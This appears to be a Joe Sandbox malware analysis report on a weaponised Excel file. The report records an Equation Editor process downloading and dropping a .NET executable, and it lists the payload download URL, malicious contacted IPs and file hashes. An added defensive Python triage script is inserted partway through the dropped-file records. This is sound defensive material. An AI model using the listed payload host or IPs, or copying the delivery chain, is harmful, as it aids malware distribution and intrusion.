                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://search.nifty.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.google.si/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.google.cz/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.soso.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.univision.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.ebay.it/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.target.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.iask.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.tesco.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
URL | Source | Malicious | Verdict | Reputation
http://cgi.search.biglobe.ne.jp/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.seznam.cz/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://suche.freenet.de/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.interpark.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.ipop.co.kr/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://investor.msn.com/ | explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp | false | - | high
http://search.espn.go.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.myspace.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.centrum.cz/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://p.zhongsou.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://service2.bfast.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.%s.comPA | explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | low

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
216.130.188.93 | unknown | United States | 27257 | WEBAIR-INTERNETUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323046
Start date: 26.11.2020
Start time: 09:02:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 15s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Booking Confirmation.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/6@5/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.2% (good quality ratio 25.8%)
• Quality average: 72.6%
• Quality standard deviation: 28%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:03:13 | API Interceptor | 120x Sleep call for process: EQNEDT32.EXE modified
09:03:18 | API Interceptor | 69x Sleep call for process: vbc.exe modified
09:03:28 | API Interceptor | 33x Sleep call for process: RegSvcs.exe modified
09:03:42 | API Interceptor | 223x Sleep call for process: raserver.exe modified
09:04:18 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                    sr43539SKp.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    rYgqmGG4iv.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    xaVDKpgbfl.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    2Acg74pnzd.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    p7ZXKudJWx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    0026.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    001-22.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    http://targetsollutions.comGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.8.164
                                                                                                                                                    http://rstuniform.comGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    http://scamcharge.comGet hashmaliciousBrowse
                                                                                                                                                    • 174.137.133.49
                                                                                                                                                    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNPI202009255687.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    IN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Purchase Order PRI19-338.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    Copy of Dwg for order DLH200909ShzuSh.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.130
                                                                                                                                                    STATEMENT NOV20.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    IN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    SCAN_ARRIVAL_DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.120
                                                                                                                                                    PO23419852020.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.124
                                                                                                                                                    New Order .xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Request for quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.120
                                                                                                                                                    Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.122

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files


C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 909312
Entropy (8bit): 7.22680766280546
Encrypted: false
SSDEEP: 12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
MD5: 5DEDC928F9F5E3A4C59490E79BCF0773
SHA1: BAB24B772B269A5D66B26A12501DADE43B80FFDE
SHA-256: C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
SHA-512: EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 25%
IE Cache URL: http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........o..........1....j...............................................0..........(....*...0..........r...p..r...p(....(....:.... ..%. .:..a%..^E............O...............}...8....(......-. ..#.%+. .\..%&+..(....(....r...p(....,. -X..%+. d..U%&. *...Za+..r)..p(....(....,. %._%+. ..*%&. ..8KZa8X...rM..p(..... ..Z X,.xa8<....(.... .).8,..........s....(....%.(.....(....*..0...............('...*..0..L........u......:.... ...5 X.5.a%...^E........................z.......g.
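The record above contains everything a triage rule needs: the process that wrote the file (EQNEDT32.EXE, the Equation Editor, which has no business writing executables), the file type (a .NET PE32), the category (downloaded) and the IE cache URL it came from. The C:\Users\Public\vbc.exe record further down carries the same MD5, which links the cached download to the copy that was actually executed. The script below is an added example, not Joe Sandbox code and not from this report: it replays those checks over the dropped-file records as transcribed from this page (the vbc.exe record is used only with the fields visible here; its IE cache URL is assumed absent) and also shows how the report's "Entropy (8bit)" figure and the PE-type check are computed from raw bytes. The rule names, the list of suspicious folders and the minimal PE header used for the self-test are assumptions of the example.

```python
"""Triage of the 'Created / dropped Files' records of a sandbox report (added example)."""
import math
import struct
from collections import defaultdict
from urllib.parse import urlparse

# Records transcribed from the report. Only fields visible on the page are used;
# the vbc.exe record has no IE cache URL here, so it is assumed absent (None).
DROPPED = [
    {"path": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe",
     "process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows",
     "category": "downloaded",
     "md5": "5DEDC928F9F5E3A4C59490E79BCF0773",
     "url": "http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe"},
    {"path": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf",
     "process": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "type": "Windows Enhanced Metafile (EMF) image data version 0x10000",
     "category": "dropped", "md5": "26D1591924B93332C93C4DAC0950AE17", "url": None},
    {"path": r"C:\Users\Public\vbc.exe",
     "process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows",
     "category": "dropped", "md5": "5DEDC928F9F5E3A4C59490E79BCF0773", "url": None},
]

# Assumptions of the example: Office helper binaries that must never write a PE,
# and folders where a freshly written executable is suspicious (tune to your estate).
OFFICE_HELPERS = ("eqnedt32.exe",)
SUSPICIOUS_DIRS = (r"c:\users\public", r"c:\users\user\appdata\local\temp")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the metric the report labels 'Entropy (8bit)'.
    0.0 for a constant buffer, 8.0 for a buffer in which every byte value is equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ stub whose e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def minimal_pe_header() -> bytes:
    """Constructed test input: the smallest buffer is_pe() accepts (MZ stub, e_lfanew=0x40, PE sig)."""
    return b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0"


def triage(records):
    """Return (rule, detail) findings for the dropped-file records."""
    findings = []
    by_md5 = defaultdict(list)
    for r in records:
        proc = r["process"].rsplit("\\", 1)[-1].lower()
        low_path = r["path"].lower()
        is_exe = r["type"].startswith("PE32")
        by_md5[r["md5"]].append(r["path"])
        # An Office helper such as the Equation Editor writing a PE is itself the alarm.
        if is_exe and proc in OFFICE_HELPERS:
            findings.append(("equation_editor_drops_pe", r["path"]))
        # A downloaded file carries the URL it came from: the host is the blocking indicator.
        if r["category"] == "downloaded" and r["url"]:
            findings.append(("download_host", urlparse(r["url"]).hostname))
        # Executables placed in world-writable or temporary folders.
        if is_exe and any(low_path.startswith(d) for d in SUSPICIOUS_DIRS):
            findings.append(("pe_in_suspicious_folder", r["path"]))
    # The same hash under two paths ties the cached download to the executed copy.
    for md5, paths in by_md5.items():
        if len(paths) > 1:
            findings.append(("same_payload_multiple_paths", md5))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(DROPPED):
        print(f"{rule}: {detail}")
```

Run stand-alone it prints four findings: the two PE writes by EQNEDT32.EXE, the ydns.eu download host, the executable in C:\Users\Public and the shared MD5. The entropy function is there so the 7.23 in the record can be reproduced against a local copy of the sample rather than taken on trust; a packed or encrypted .NET payload typically sits in that 7+ range, while the EMF and JPEG records show what ordinary Office render artefacts look like.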
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1099960
Entropy (8bit): 2.0153298378795275
Encrypted: false
SSDEEP: 3072:PXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:VahIFdyiaT2qtXw
MD5: 26D1591924B93332C93C4DAC0950AE17
SHA1: 3E92ECC9EF71E262C4607DED0ED85C0C16FCF18E
SHA-256: B6FB1C5D8AA5E51E4668270CA5BCDDBE6F5A0DC292F9D82CA429240CDEB47A84
SHA-512: 797D4CDF629E88C835FEC6ED915508221F6CEF3AEFFAFEFD103BFFD683B08F4B422D957DDB94D316E979C7A3C272346734DA1117F25A3AE644CB6EE3B9B6A5B3
Malicious: false
Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................d...........H....N.U............0........N.U........ ....y.Q........ ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.............T...X............2.Q........0...0....{.Q....X.......dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A709BC1.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category: dropped
Size (bytes): 48770
Entropy (8bit): 7.801842363879827
Encrypted: false
SSDEEP: 768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5: AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1: 200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256: 56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512: A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious: false
Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB9FCECE.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category: dropped
Size (bytes): 48770
Entropy (8bit): 7.801842363879827
Encrypted: false
SSDEEP: 768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5: AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1: 200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256: 56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512: A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious: false
Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
C:\Users\user\Desktop\~$Booking Confirmation.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: true
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%

Static File Info

General

File type: CDFV2 Encrypted
Entropy (8bit): 7.996438735158698
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: Booking Confirmation.xlsx
File size: 2169344
MD5: 97ee696e60901ec520c93f0e8b29b956
SHA1: 89780a503e1b57b7d224feb43c5db4db60ede9ff
SHA256: 2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
SHA512: 2af275f7b9d0a9c563972caf51d3550d9a5e8f6d77302071115baf1ae37d6facc00b2d6b3f03270c2ab5ba7934d40d75dc635be5017ccc65fbcbb3d20893f57d
SSDEEP: 49152:HQIDUI5g3cMwIEfNzZgGBfCReviw1hkmhvdaYf2XmjrM41KtNFvE:1UMg0IuZgwCcvirmhAYfBc41KTFM

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Booking Confirmation.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
General
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
